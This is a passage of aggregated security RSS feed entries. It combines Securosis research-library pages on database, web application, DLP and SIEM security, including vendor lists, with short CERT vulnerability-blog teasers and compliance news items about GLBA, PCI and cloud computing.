None at this time Vendors/Tools --------- The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). It does not imply endorsement, and is meant to assist you should you start looking for tools. Please email info@securosis.com if you have any additions or corrections. Database Security Platforms * Application Security Inc. (DBProtect) * Fortinet. * GreenSQL. * IBM (Guardium). * Imperva (SecureSphere) * McAfee (Sentrigo) (Nitro). * Oracle (Secerno). Database Vulnerability Assessment * Application Security Inc.. (AppDetective, DBProtect) * Fortinet. (IPLocks). * IBM (Guardium). * Imperva. (DAS, Scuba) * McAfee. (Sentrigo) * Oracle. (mValent, Config. Packs) * Qualys. * Tenable Network Security. (Nessus) * Next Generation Security Software NGS. (Squirrel) Database Encryption * NetLib. * Oracle. (TDE, API) * Protegrity. * Prime Factors. * Relational Wizards. * RSA. (Valyd) * SafeNet. (Ingrian) * Sybase. * Thales. (aka nCipher) * Trustwave. (Vericept) * Voltage. Note that some of the vendors listed provide transparent disk encryption or application layer encryption that can be applied to database files or content. Database Auditing * GreenSQL * Oracle (Audit Vault). * SoftTree Technologies. (DB Audit Expert) * Quest. (InTrust for DB) Note that all DAM vendors provide auditing to one degree or another. This section is to designate specific products that provide database auditing, are not part of a DAM solution, and are not built into a database platform as a standard component. Database Masking * Axis Technology. * Camouflage. * dataguise. * Embarcadero. * Grid-Tools. * GreenSQL. * Hexaware/Akiva. * IBM. (Optim/Princeton Softech) * Informatica. (ETL + Applimation) * MENTiS Software. * Voltage. (ETL + Dynamic) Note that there are several vendors who offer format preserving encryption and tokenization, such as NuBridges, Prime Factors, Protegrity and Voltage, which also provides some masking capabilities. Database Vendors * IBM. * Oracle. (Oracle, MySQL) * Sybase. * Teradata. * Apache. (Derby) * PostgreSQL. (Postgres) * Ingres. (Open Ingres) There are dozens of vendors, both big and small, who offer databases – many with specific competitive advantages. We aren’t even attempting to comprehensive, and specifically ignored any without widespread mainstream adoption. There are also dozens more open source databases with small numbers of deployments, perhaps primarily embedded in applications or backending non-commercial web applications.

==> Web Application Security

http://securosis.com/feeds/research Here we focus on security specifically for web applications, as opposed to traditional corporate or enterprise applications. Our research pages on general application security should be used in tandem with this one, but this section focuses on the unique issues of web application security. By our definition, Web Application Security is a super-set of traditional application security. Why? Because more often than not, web applications are backed by enterprise applications. They have all of the same problems, along with a handful of new security issues that are specific to offering distributed programs and functions across the Internet. For example web applications offer features and functions to users outside the corporate network, so they cannot make any assumptions about the security of the network transmission nor the intentions of the user. They run on top of a complex conglomeration of services, consist primarily of custom code, produce dynamic content, and provide their UI entirely through a browser. Papers and Posts ------------ If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments). 1. The most important piece of work we’ve published on Web Application Security is Building a Web Application Security Program. For those of you who followed along with the blog series, this is a compilation of that content, but it’s been updated to reflect all the comments we received, with additional research, and the entire report was professionally edited. The original blog series can be found here (Part 1, Part 2, Part 3, Part 4, Part 5, Part 6, Part 7, and Part 8. As well as a couple points we forgot to mention. 2. Rich’s post on How the Cloud Destroys Everything that I Love (About Web App Security). 3. The Risks of Trusting Content. 4. Web Application Security: We Need Web Application Firewalls to Work. Better. General Coverage ------------ 1. XML Security Overview 2. It’s Thursday the 13th—Update Adobe Flash Day 3. Heartland Hackers Caught; Answers and Questions 4. Using a Mac? Turn Off Java in Your BrowserWere All Gonna Get Hacked is about the browser, not the app, but we’ll cross reference here. 5. There Are No Trusted Sites: Security Edition 6. Click-jacking Details, Analysis, and Advice. 7. Comments on “Containing Conficker”, a brief analysis of the Honeynet Project’s Know Your Enemy paper, an examination of how the Conficker worm attacks and behaves in general. 8. WAF vs. Secure Code vs. Dead Fish. 9. Adrian’s comments on structured software development security programs and the problems moving from Waterfall to Agile Software Development. Presentations --------- * Our presentation on Building A Web Application Security Program. This was presented as supplementary material to the white paper of the same name. * Presentation on Integrating Penetration Testing Into a Web Application Vulnerability Assessment Program. (PDF) Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic. Vendors/Tools --------- The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). It does not imply endorsement, and is meant to assist you should you start looking for tools. Please email info@securosis.com if you have any additions or corrections. Remember that web application security is over and above the standard application security practices and technology, and these should be considered alongside other tools. We strongly encourage you to learn about the specifics of subcategories in the navigation menu. Web Application Assessment * Cenzic * HP * Secure Works * WhiteHat Security Penetration Testing * AppLabs * Bonsai * CGISecurity * Core Security Technologies * McAfee (Foundstone) * Plynt * Rvasi * WindowSecurity.com Static Source Code Review * Aspect Security * Cigital * Fortify * IBM * Ounce * Veracode Dynamic Source Code Review * Coverity * Ounce * Veracode Web Application Firewalls * armorlogic. * ArtofDefense Hyperguard * Barracuda Networks. * Breach. * Cisco. * F5. * Fortify. * Fortinet * Imperva. * Protegrity. Monitoring (All WAF vendors can monitor as well.) Education & Training * SANS Institute * SAIC Most regional ISSA and ISACA chapters can provide assistance as well.

==> Web, Email, and Data Portal Security

http://securosis.com/feeds/research This research page covers web filtering as well as email security and anti-spam options. The email security market, like the web gateway market, is one of the most saturated and commoditized in the security industry. As with firewalls and anti-virus (on Windows), it is essentially impossible to do business without these tools. And to no one’s surprise we see continued convergence of these threat protection products; in some cases, it’s merely mergers and acquisitions to provide two separate products from the same vendor, but in other cases we see combined solutions – often in an attempt to displace point products. As many of the site-managed solutions also offer gateway and secure data exchange services, we will cover that here as well. The intended audience for this page is those interested in security products for their business, to keep their users’ inboxes free of spam, and ensure Internet browsing stays within company policy. In the past we would just have said ‘bleep’, as that is why many of these platforms are purchased. In reality there are many other security and compliance uses for these technologies, which are as least as important. Papers and Posts ------------ If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments). 1. Barracuda Networks Acquires Purewire 2. McAfee Acquires MX Logic 3. The Symantec acquisition of MessageLabs demonstrates that the battle for this fully commoditized market is not over. 4. Marshal8e6 Buys Avinti, and how the smaller vendors need to innovate and re-position their technologies to compete. General Coverage ------------ 1. The First Phishing Email I Almost Fell For 2. I Heart Creative Spam 3. Spam Levels and Anti-Spam SaaS. 4. Hackers 1, Marketing 0. Presentations --------- PDF versions of presentations (when available) may also be useful, although they don’t include any audio (for any audio/video, please see the next section). Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic. Vendors/Tools --------- The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). It does not imply endorsement, and is meant to assist you should you start looking for tools. Please email if you have any additions or corrections. Vendors * Aladdin * Astaro * Axway (Tumbleweed) * Barracuda Networks * Cisco (Ironport) * Clearswift (MIMESweeper) * Cloudmark * CommTouch * Google (Postini) * Marshal8e6 (Mail Marshal + 8e6 Technologies) * McAfee (IronMail, WebWasher, Secure Computing, CipherTrust) * Proofpoint * SonicWall (MailFrontier) * Symantec (BrightMail and MessageLabs) * WebSense

==> Research: Data Loss Prevention

http://securosis.com/feeds/research We’ve probably written more about Data Loss Prevention than any other single technology. Actually, we prefer to call it Content Monitoring and Protection (CMP), but when we use that only about 3 people know what we’re talking about. We define CMP/DLP as: Products that, based on central policies, identify, monitor, and protect data at rest, in motion, and in use through deep content analysis. We use a pretty narrow definition to keep things clear – CMP/DLP is a defined product category, not some general definition for anything that protects data. Encryption, DRM, portable device control, and all the other things that call themselves DLP can help with data loss, but aren’t DLP. We think using a big bucket like that only confuses people. The best way to tell if something is DLP is to focus on the content awareness/analysis. If it only uses keywords or basic regular expressions, it isn’t really DLP. Now why should you care about DLP? Is it just another over-hyped technology? Nope – we consider it to be one of the most significant security technologies to emerge over the past few years. By adding content and context awareness, we can now protect information based on what it is, as opposed to where it’s stored or some silly label someone slapped on it as metadata. CMP tools are also expanding their understanding of business context, not just the data itself, so we can apply intelligent policies that reflect business processes, while only interfering with said processes when there is a policy violation. CMP helps us find our sensitive information, watch how it’s being used, and then protect it. It’s far from perfect, but it’s still good enough that we recommend it, and we’d use it ourselves if we didn’t just give away all of our stuff for free. We keep all of our Research Library pages updated with our latest research. Content is added where it fits best, not in chronological order, so we mark new material with the month/year it was added to help you find changes more easily. Papers and Posts ------------ If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all of the public comments as well). 1. The most important piece of work we’ve published on CMP/DLP is our white paper, [Understanding and Selecting a Data Loss Prevention Solution(/research/publication/report-data-loss-prevention-whitepaper/). This report covers all the basics- features, architectures, use cases, and a recommended selection process with testing criteria. It was originally released as a series of blog posts: part 1 (introduction), part 2 (content awareness), part 3 (data-in-motion), part 4 (data-at-rest), part 5 (data-in-use/endpoint), part 6 (central administration), and part 7 (selection process). This is really the place to start if you need to learn about DLP. 2. I also wrote a feature for Information Security Magazine that covers similar material, but is much more condensed. 3. We also released a paper on Best Practices for DLP Content Discovery. This covers all the important issues when using DLP for data at rest. It was also a 6 part series: part 1, part 2, part 3, part 4, part 5, part 6 (use cases). 4. The third paper in our CMP/DLP series is dedicated to Best Practices for Endpoint DLP. As always, available in a series of blog posts: part 1, part 2, part 3, part 4, part 5, part 6 (use cases). 5. An early article on DLP as a feature vs. a full solution: DLP Is A Feature, CMF (Or Whatever We’ll Call It) Is A Solution. 6. A discussion on the evolution of CMP: DLP/ILP/Extrusion Prevention < CMF < CMP < SILM: A Short Evolution of Data Loss Prevention. 7. A short piece I did for Network World on DLP, and why it’s worth looking at now. 8. I’m a big proponent of full DLP solutions- this explains why: Data Protection Isn’t A Network Security Or Endpoint Problem. 9. The dirty little secret of DLP. 10. Data protection developments are running along parallel paths – one for productivity applications and communications (CMP/DLP), and the other in the data center (ADMP). Our definitions of DLP and ADMP. 11. Then a post on how those two worlds will connect. 12. A Network World article I wrote on pitfalls of DLP. 13. A look at the differences between DLP, content classification, and e-discovery. 14. You can also use DLP to help prevent malicious outbound connections from sophisticated attackers. 15. In Quick Wins with Data Loss Prevention we cut through the complexity and provide a process for getting immediate value out of your DLP investment, while still setting yourself up for the long term. Presentations --------- Presentation on Understanding and Selecting a Data Loss Prevention System. This is a companion to the DLP White Paper. Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic. Vendors/Tools --------- The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). It does not imply endorsement, and is meant to assist you should you start looking for tools. Please email info@securosis.com if you have any additions or corrections. Note that many other products include “DLP light” features, such as basic keyword or regex matching. We are only including dedicated DLP solutions here. Full Suite DLP * CA (Orchestria) * Code Green Networks * EMC/RSA (Tablus) * GTB Technologies * McAfee (Reconnex) * Symantec (Vontu) * Vericept * Websense (PortAuthority) * Workshare Network-only tools * Clearswift * Fidelis Security Systems * Palisade Systems * Proofpoint Endpoint-only tools * NextSentry * Trend Micro (Provilla) * Verdasys

==> Application Security

http://securosis.com/feeds/research This section of the research library is dedicated to application security in its many forms. On this page we cover the basic topics; such as Access Control, Monitoring & IDS, SIM, SEM, and Log Management. For other specialized fields within application security, such as web application security and secure software development practices, we provide dedicated subsections. On the navigation bar you will see that we already have a few pages for specific coverage areas. We will continue to fill out our application security offerings, and provide additional specific coverage areas over time. Feel free to make a request if you have something in this area you are interested in seeing. Papers and Posts ------------ * Adrian’s comments on structured software development security programs and the problems moving from Waterfall to Agile Software Development. * How Common Applications Are (Now) the Weakest Link. * Comments on “Containing Conficker” considers some of the challenges most application developers are up against. * Immutable Log technologies help with auditing and event trail verification. * For application security, the implementation and management of a policy set is a key factor in the cost and effectiveness of just about any security product (and, frankly, your happiness as well). * Separation of Duties, Concept of Least Privilege, and other role-based user security measures. * The Perils of the Insider Threat. * PDF Security Pain, and stuff to think about on all script-enabled applications. * A very cool way of reverse engineering applications and content with Visual Forensic Analysis tools. Presentations --------- * Security + Agile = FAIL. Live presentation is here. * This presentation covers Major Enterprise Application Security. Podcasts, Webcasts and Multimedia

==> SIM, SIEM, and Log Management

http://securosis.com/feeds/research This research page covers System Information Management (SIM), System Event Management (SEM), and Log Management technologies. Basically anything that collects events from application and host system log files, or provides analysis and reporting on those events. There will be a few other variants in the type of data collected, where it is collected from, and the speed and depth of analysis performed. As these three areas are morphing into one, we felt it would be best at this time to stop pretending they are “differentiated” things and talk about the common business problems they help customers address. Papers and Posts ------------ If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments). This research page covers System Information Management (SIM), System Event Management (SEM), and Log Management technologies. Basically anything that collects events from application and host system log files, or provides analysis and reporting on those events. There will be a few other variants in the type of data collected, where it is collected from, and the speed and depth of analysis performed. As these three areas are morphing into one, we felt it would be best at this time to stop pretending they are “differentiated” things and talk about the common business problems they help customers address. Papers and Posts ------------ If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments). 1. SIEM, Today and Tomorrow is a look back at some of the evolutionary struggles of SIM/SEM, and what is happening with the market space today. 2. LogLogic Acquires Exaprotect. 3. It seems like every other post we mention SIM/SEM and Log Management. We get a briefing from a vendor nearly every week, and we both know and cover this space. Creating this research page, we realized just how few posts we have written that are dedicated to it. We will provide more in the coming weeks. General Coverage ------------ 1. Policies and Security Products, covering the expense of policy creation and maintenance. Presentations --------- 1. Adrian’s presentation on Meeting Compliance with SIM, SEM and Log Management provides an in-depth discussion of using SIM/SEM and Log Management products for meeting compliance, and offers practical tips in dealing with technical and process challenges. Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic. Vendors/Tools --------- The following is just an alphabetized and categorized list of vendors and products we are aware of in this area (including free tools). It does not imply endorsement, and is meant to assist you, should you start looking for tools. Please email info@securosis.com if you have any additions or corrections. Vendors ArcSight CA CISCO MARS eIQ ExaProtect IBM Intellitactics LogLogic LogRhythm NetForensics NetIQ NitroSecurity Quest InTrust RSA EnVision Sensage Symantec SSIM Tenable TriGeo Q1 Labs

==> Project Quant

http://securosis.com/feeds/research Project Quant is a special research project to develop a metrics model for measuring the costs and effectiveness of patch management. This page includes the research deliverables associated with the project. All of the draft materials and public feedback are available on the project Blog and Forums: * The Project Quant Blog and Landing Page * The Project Quant Forums Published project documents include: * Version 1.0 of the Project Quant Report * The Project Quant Survey Results Analysis Here are the raw survey results from the project’s Open Patch Management Survey: * Project Quant Raw Survey Results, September 2009. (Zip file includes summary results in Excel format, and full raw results in Excel and CVS formats.) * The survey is still active, and you can participate here.

==> ADMP: Application and Database Monitoring and Protection

http://securosis.com/feeds/research Applications and Database Monitoring and Protection: ADMP. What is it? It’s a different way to think about security for applications. It’s a unified approach to securing applications by examining all of the components at once, viewing security as an operational issue, and getting tools to talk to each other. It means looking at application security in context of the business rules around transaction processing, and not just from a generic network traffic perspective. It is also a bit of prognostication, recommendation, and evangelism on our part, all rolled up into one unified theory. This approach also defocuses from some of the more traditional network and platform security models, and looks at the data and how applications process transactions and data. ADMP is essentially the data center branch of information-centric security, and it combines elements of data and application security into a consistent and specific architecture. The goal is to watch application transactions from the browser through the database, and apply security controls that actually ‘understand’ what’s going on. Our definition is: Products that monitor all activity in a business application and database, identify and audit users and content, and, based on central policies, protect data based on content, context, and/or activity. Papers and Posts ------------ 1. The lead-in to this series of thought is Rich’s posts on The Future Of Application and Database Security, Part 1 and Part 2. 2. Definitions: Content Monitoring and Protection And Application and Database Monitoring and Protection. 3. What is my motivation, or Why Are We Talking About ADMP. 4. ADMP and Assessment: Linking preventative and detective technologies. 5. ADMP: A Policy Driven Example. 6. Web Application Security: We Need Web Application Firewalls to Work. Better. 7. It’s Time To Move Past Vulnerability Scanning To Anti-Exploitation. Presentations --------- * Our presentation on Information Centric Data Security and the Data Centric Security Lifecycle. Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic.

==> Phishing Techniques Steal Sensitive Data

http://www.baselinemag.com/rss-feeds-65.xml It's essential to deploy a variety of security tools and techniques, but the biggest problem revolves around workers who aren’t trained to spot phishing methods and sidestep attacks.

==> Companies Take Risks With Compliance

http://www.baselinemag.com/rss-feeds-65.xml Over the last decade, compliance has emerged as an enormous challenge for organizations large and small. Amid a spate of regulations and requirements, many companies are struggling to manage policies and regulations. A study of 200 North America IT and business executives conducted by DataMotion, provider of cloud-based data delivery services, indicates the severity of the problem. Nearly one in three respondents admitted that their organization knowingly takes compliance risks. "Data breaches are more prevalent than ever, and regulatory agencies are handing out millions of dollars in fines for privacy and security violations, yet this survey shows companies are still cutting corners," noted DataMotion Chief Technology Officer Bob Janacek. A main problem is caused by executives who believe a data breach is less expensive than the cost of compliance. What these executives fail to recognize, he says, is that "the price they'll pay goes far beyond compliance fines." Their brand is likely to take a hit, and their reputation will suffer.

==> Dos/DDoS Attacks Grow in Complexity

http://www.baselinemag.com/rss-feeds-65.xml As GoDaddy and Bank of America recently discovered, denial of service (DoS) attacks and distributed denial of service (DDoS) attacks are commonplace and increasingly sophisticated.

==> Protect Your Company With a CSIRT

http://www.baselinemag.com/rss-feeds-65.xml An effective computer security incident response team (CSIRT) can help your organization protect critical assets and data and lower risks by increasing awareness and creating controls.

==> Java 7 Attack Vectors, Oh My!

http://www.cert.org/blogs/vuls/rss.xml While researching how to successfully mitigate the recent Java 7 vulnerability (VU#636312, CVE-2012-4681), we (and by "we" I mean "Will Dormann") found quite a mess. In the midst of discussion about exploit activity and the out-of-cycle update from Oracle, I'd like to call attention to a couple other important points.

==> The Report "Network Profiling Using Flow" Released

http://www.cert.org/blogs/vuls/rss.xml Hi, this is Austin Whisnant of the CERT Network Situational Awareness Team (NetSA). After a long time in the making, NetSA has published an SEI technical report on how to inventory assets on a network using network flow data. Knowing what assets are on your network, especially those visible to outsiders, is an important step in gaining network situational awareness.

==> Java Security Manager Bypass Vulnerability

http://www.cert.org/blogs/vuls/rss.xml Last Sunday, another major Java vulnerability (VU#636312) was reported. Until an official update is available, we strongly recommend disabling the Java 7 plug-in for web browsers.

==> CERT Failure Observation Engine 2.0 Released

http://www.cert.org/blogs/vuls/rss.xml Hi folks, Allen Householder from the CERT Vulnerability Analysis team here. Back in April, we released version 1.0 of the CERT Failure Observation Engine (FOE), our fuzzing framework for Windows. Today we're announcing the release of FOE version 2.0. (Here's the download.) Although it has only been a few months since we announced FOE 1.0, our development cycle is such that FOE 2.0 actually reflects nearly a year of additional improvements over the 1.0 release. Our main focus in developing FOE 2.0 was to apply what we learned from creating the CERT Basic Fuzzing Framework version 2.5 for Linux and OS X to improve our fuzzing capabilities on Windows. We are gradually converging our code bases for BFF and FOE to simplify maintenance and the incorporation of new features. We're not quite there yet, but FOE 2.0 reflects a significant step in that direction. Read on for more details.

==> Vulnerability Data Archive

http://www.cert.org/blogs/vuls/rss.xml With the hope that someone finds the data useful, we're publishing an archive of almost all of the non-sensitive vulnerability information in our vulnerability reports database.

==> CERT Basic Fuzzing Framework 2.5 Released

http://www.cert.org/blogs/vuls/rss.xml Hi folks, Allen Householder here. In addition to the recent introduction of our new Failure Observation Engine (FOE) fuzzing framework for Windows and Linux Triage Tools, we have updated the CERT Basic Fuzzing Framework (BFF) to version 2.5. This post highlights the significant changes.

==> CERT Linux Triage Tools 1.0 Released

http://www.cert.org/blogs/vuls/rss.xml As part of the vulnerability discovery work at CERT, we have developed a GNU Debugger (GDB) extension called "exploitable" that classifies Linux application bugs by severity. Version 1.0 of the extension is available for public download here. This blog post contains an overview of the extension and how it works.

==> Vulnerability Severity Using CVSS

http://www.cert.org/blogs/vuls/rss.xml If you analyze, manage, publish, or otherwise work with software vulnerabilities, hopefully you've come across the Common Vulnerability Scoring System (CVSS). I'm happy to announce that US-CERT Vulnerability Notes now provide CVSS metrics.

==> CNAME flux

http://www.cert.org/blogs/vuls/rss.xml Hello this is Jonathan Spring. Recently, Leigh Metcalf and I uncovered some interesting results in our continuing work on properties of the Domain Name System (DNS). Our work involves an unconventional use of CNAME (canonical name) records. Besides an IP address, CNAME records are the only other location a domain may have in the DNS. Instead of an IP address, a CNAME record is a redirection or alias service that points to another name.

==> Challenges in Network Monitoring above the Enterprise

http://www.cert.org/blogs/vuls/rss.xml Recently George Jones, Jonathan Spring, and I attended USENIX Security '11. We hosted an evening Birds of a Feather (BoF) session where we asked a question of some significance to our CERT® Network Situational Awareness (NetSA) group: Is Large-Scale Network Security Monitoring Still Worth Effort?

==> Signed Java and Cisco AnyConnect

http://www.cert.org/blogs/vuls/rss.xml A few years ago, I published a blog entry called Signed Java Applet Security: Worse than ActiveX? In that entry, I explained the problems that arise when a vulnerability is discovered in a signed Java applet. Let's see how the Cisco AnyConnect vulnerability is affected.

==> Detecting Abnormal Technology Systems Behavior

http://www.compliancehome.com/rss/resources-GLBA.xml With hundreds and thousands of automated systems producing log data, an organization's ability to respond to

==> Upgraded Version of WebSearch Launched by DocuLex

http://www.compliancehome.com/rss/resources-GLBA.xml WebSearch version 4.2 that boasts of additional features like customized business process and collaborative workflow capability has been introduced by DocuLex, Content management software provider. WebSearch version 4.2 is a product of DocuLex Archive Studio that helps organizations with decision making power via automation of any business process through the benefit of systematic workflow.

==> Model Consumer Privacy Notice Online Form Builder Released by Federal Regulators

http://www.compliancehome.com/rss/resources-GLBA.xml An Online Form Builder that financial institutions can download and use to develop and print customized versions of a model consumer privacy notice is released by eight federal regulators, including the Federal Reserve Board and the Federal Trade Commission. The form builder, based on the model form regulation published in the Federal Register on Dec. 1, 2009, under the Gramm-Leach-Bliley Act (GLBA), is available with several options. The form builder will guide an institution to select the version of the model form that fits its practices, such as whether the institution provides an opt-out for consumers.

==> ACA-Supported Gramm-Leach-Bliley Reforms Passed by U.S. House

http://www.compliancehome.com/rss/resources-GLBA.xml The U.S. House of Representatives passed H.R. 3506 by voice vote on the Suspension Calendar, creating a positive policy step forward for our industry on on April 14, 2010. H.R. 3506, which was sponsored by Representatives Erik Paulsen (R-MN) and Dennis Moore (D-KS), removes burdensome requirements under the Gramm-Leach-Bliley Act (GLBA).

==> An Advisers msut know the ways to protect clients' privacy

http://www.compliancehome.com/rss/resources-GLBA.xml As more and more personal financial information is transmitted online and stored electronically, concerns about privacy and data protection have grown. For financial advisers, privacy issues will only become more important as technology and new types of media proliferate.

==> Reasons Why the U.S. Wont Be Prepared For Cyberwar by Rockefeller-Snowe's Regulations

http://www.compliancehome.com/rss/resources-GLBA.xml Sens. Jay Rockefeller (D-W. Va.) and Olympia Snowe (R-Maine) have formulated a new cybersecurity bill that they described in Fridays Wall Street Journal. (Use Google news to get to the full article.) The bill as proposed will be very disruptive to the operations of every business and will do essentially nothing to prepare the U.S. for cyberwar.

==> GLBA Privacy Notices At Last Get Overhauled

http://www.compliancehome.com/rss/resources-GLBA.xml On November 17, 2009, the Federal Trade Commission (FTC), along with other federal regulators (Federal Deposit Insurance Corporation, Federal Reserve Board, Office of the Comptroller of the Currency, Office of Thrift Supervision, National Credit Union Administration, Commodity Futures Trading Commission, and Securities and Exchange Commission, collectively referred to as Agencies) adopted final Model Privacy Notice forms for compliance with the Gramm-Leach Bliley Act (GLBA) and its implementing regulation, the FTCs Financial Privacy Rule. The Model Privacy Notice replaces the Sample Clauses, which appear in Appendix B to the Privacy Rule and, as such, now provide the safe harbor for compliance.

==> Cloud Computing Backup? Significant Questions

http://www.compliancehome.com/rss/resources-GLBA.xml The quick evolution and maturity of cloud storage providers creates a new opportunity for managed service providers to offer cloud backup services. Backup to the cloud can provide a compelling cost advantage for SMB and SME customers and it opens up a new model for VARs and MSPs to profit with cloud-based backup services.

==> Effective Workflow for Fixing Network Vulnerabilities & Policy Compliance

http://www.compliancehome.com/rss/resources-GLBA.xml This webcast Abstracts the 8 workflow processes that create an effective vulnerability management solution to ensure security and document compliance. Discover how the right software-as-a-service (SaaS) solution automates these processes for fast, cost-effective remediation and policy compliance. View this webcast and learn about and effective remediation plan that provides continuous protection from network vulnerabilities and helps comply with regulations such as PCI, GLBA and HIPAA

==> New Degausser Introduced by SEM

http://www.compliancehome.com/rss/resources-GLBA.xml The Model EMP001 Eliminator Hard Drive and Magnetic Tape Degausser is being introduced by Security Engineered Machinery, its most recent product for degaussing hard drives. The electromagnetic-pulse degausser permanently erases data from computer hard drives, data tapes, and other magnetic media. The EMP001 is on the U.S. National Security Agency's Evaluated Products List, complies with Department of Defense requirements for destroying classified information on magnetic media, and exceeds the requirements of many national and international legislative mandates (FACTA, HIPAA, GLB, DPA, etc.) for the destruction of confidential/sensitive data.

==> Is Compliance in the Cloud Achievable

http://www.compliancehome.com/rss/resources-GLBA.xml There is no doubt that cloud computing is dominating today's IT conversation among C-level security executives. Whether it's due to the compelling cost saving possibilities in a tough economy, or because of perceived advantages in provisioning flexibility, auto-scaling, and on-demand computing, CSOs are probing the capabilities, costs and restrictions of the cloud. At the same time, security and compliance concerns are at the forefront of issues potentially holding large enterprises back from capitalizing on the benefits that cloud computing has to offer.

==> Harmonizing Controls to Reduce Your Cost of Compliance

http://www.compliancehome.com/rss/resources-GLBA.xml Mounting regulations across the globe have increased the cost and burden on organizations. The high cost is especially felt by organizations which must adhere to multiple requirements - 75 percent of organizations must comply with two or more regulations and corresponding audits and more than 40 percent must comply with three or more regulations.

==> Detecting Abnormal Technology Systems Behavior

http://www.compliancehome.com/rss/resources-GLBA.xml With hundreds and thousands of automated systems producing log data, an organization's ability to respond to

==> Federal and State Data Regulations Not to be Overlooked

http://www.compliancehome.com/rss/resources-GLBA.xml Tracking new regulations and compliance rulings from federal and state government can be dizzyingthey include FRCP, HIPAA, GLB, and more. But now more than ever, the government expects all businesses to comply, not just large corporations. Today, every company is responsible for its data and for securing its customers information, no matter how much it costs to do so. In todays litigious business world, the possibility of being dragged into a lawsuit is very real, and if that happens, you will likely need to make your information available to the process. And woe to the company that cannot comply with basic regulations, because a judge will not accept that you thought those requirements applied only to the big companies.

==> Trailing Ground: Gramm-Leach-Bliley and the Future of Banking

http://www.compliancehome.com/rss/resources-GLBA.xml The debate in Washington over financial regulation has probably puzzled most of the observers by references to the GLBA as a cause of the financial crisis. At the time of its adoption, the GLBA was hailed as a forward-looking effort to bring new flexibility and change to the banking industry. As described by John LaFalce, then the ranking Democrat on the House Financial Services Committee,

==> Payment System Product Codes to be Evaluated by PCATS

http://www.compliancehome.com/rss/resources-GLBA.xml A survey to identify the use of PCATS payment product codes within the convenience store industry has been created by the Petroleum Convenience Alliance for Technology Standards (PCATS). In addition to measuring the number of merchant fueling locations that have implemented PCATS standard payment product codes at their point of sale (POS), the survey may also help identify additional items that need to be added to the current industry code list.

==> IBM's Acquisition Of Guardium Created a Buzz in Security market

http://www.compliancehome.com/rss/resources-GLBA.xml IBM's acquisition of database activity monitoring (DAM) vendor Guardium has created a lot of buzz in the security industry. This is the first major acquisition in the database security market, the first time a large company has bet on DAM technology, and if the rumored sales price is accurate, then it suggests IBM paid a premium. And given the value this product can provide to IBM customers, it looks like a good investment.

==> A Combined Security Solution for Governance Portal

http://www.compliancehome.com/rss/resources-GLBA.xml A worldwide business consulting and internal audit firm, Protiviti Inc., has introduced the first product in its new Governance Portal for Information Technology series. The product is a security solution directed at mitigating data security risks and avoiding costly data breaches and reputation damage.

==> Analyst Webinar on Risk and Compliance Management: Learning from Leaders and Steps You Can Take

http://www.compliancehome.com/rss/resources-GLBA.xml Join Forrester Research Analyst, Chris McClean, for learning what leading companies are doing for effective risk and compliance management and step you can take today. While Risk managers in all industries are grappling with the problems of performing real-time risk measurement and mitigation, an additional complexity due stringent compliance and regulatory requirements, like SOX, FCPA, HIPAA, AML, GLBA, FERC, NERC and many more, add an additional layer of challenges for them. As a result, companies are looking to systematically identify, measure, prioritize and respond to all types of risk in the business, while ensuring compliance to federal and state regulations.

==> PCI - It's Not Quite Everywhere It Should Be

http://www.compliancehome.com/rss/resources-GLBA.xml Join to learn about critical technologies that can assist your PCI compliance efforts. We will discuss how to: Protect critical data from leaving your enterprise through malicious hackers and/or employee mistakes Go beyond intrusion detection and prevention to a positive, proactive, security model that protects against new email and web-borne attacks, Safely enable remote employees, partners, contractors and other third parties to authenticate and access pertinent information, Implement security measures that ensure simultaneous compliance with PCI, SOX, GLBA, HIPAA and other privacy and data protection regulations.

==> Satellite Technology Used by Glacier Bay National Park Rangers to Help Tousled Whales

http://www.compliancehome.com/rss/resources-GLBA.xml Rangers in Glacier Bay National Park respond not only to human visitors in trouble, but also to marine life that need help. A recent case of a humpback whale that became entangled in a polyester line demonstrates not only the quick response of park rangers, but also how satellite technology can play a role in saving whales.

==> 'Managing the Cloud: Are You Comfortable with Where Your Data Sleeps at Night?'

http://www.compliancehome.com/rss/resources-GLBA.xml Why is cloud computing relevant today from an economic, business and technology standpoint? What are some potential benefits and pitfalls of moving to the cloud? What should you look for in a cloud computing provider to ensure the security of your data and applications? In an October 8 interview from Times Square, Sam Gross, vice president, Global Information Technology Outsourcing Solutions, Unisys Corporation, will answer these questions and more. Sam will talk about how the economy is accelerating a tectonic shift in IT and how it supports the business. bleep also discuss how to transform a traditional data center that is inflexible less flexible and costly to a cloud computing environment that is secure, virtualized and automated requiring less investment.

==> Sipera Secure Live Communications Mobility System Made Available by era Systems

http://www.compliancehome.com/rss/resources-GLBA.xml Smartphone VoIP and unified communications, or UC, business ready are offered by Sipera SLiC. This latest offering delivers enterprise-class communications privacy and security for VoIP and UC on smartphones. Additionally, the companys system enables smartphone VoIP to include smart-card card authentication for accessing enterprise resources. Company officials said that this provides unparalleled access control and communications privacy.

==> The Wonderful Triangle of IT Security

http://www.compliancehome.com/rss/resources-GLBA.xml The myths of the CIA triad Have you ever considered taking a role as the most senior person for information security working at a large corporation? Then you must be prepared to understand the key principles of information security-and how they really apply to life and business.

==> Sensitive Data to be Sealed by Solid Wireless Security Policies (Part 3)

